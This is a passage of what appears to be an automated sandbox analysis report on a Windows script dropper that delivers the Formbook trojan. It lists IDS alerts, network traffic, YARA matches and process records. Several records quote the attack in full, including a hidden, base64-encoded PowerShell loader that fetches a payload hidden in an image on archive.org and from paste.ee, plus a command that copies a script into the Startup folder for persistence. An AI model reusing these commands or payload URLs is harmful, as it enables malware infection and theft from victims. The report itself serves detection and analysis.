            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49708 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.8:49706
            Source: unknownDNS query: name: paste.ee
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/A2fG2/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 207.241.227.242 207.241.227.242
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/A2fG2/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ia600102.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600102.us.archive.org
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.1517721610.0000019C59EDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DB83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000005.00000002.1517721610.0000019C59E8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000005.00000002.1517721610.0000019C59EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DBBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DBAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7747000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000008.00000002.1612225136.0000021AE49A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i0002.us
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.arX
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org
            Source: powershell.exe, 00000006.00000002.1774942207.000002024E09D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/it
            Source: powershell.exe, 00000008.00000002.1612130354.0000021AE48C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/A2fG2/0
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49708 version: TLS 1.2

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 7892, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8004, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0042C853 NtClose,11_2_0042C853
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034435C0 NtCreateMutant,LdrInitializeThunk,11_2_034435C0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442B60 NtClose,LdrInitializeThunk,11_2_03442B60
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03442DF0
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03442C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03442C70
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03444340 NtSetContextThread,11_2_03444340
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03443010 NtOpenDirectoryObject,11_2_03443010
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03443090 NtSetValueKey,11_2_03443090
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_03444650 NtSuspendThread,11_2_03444650
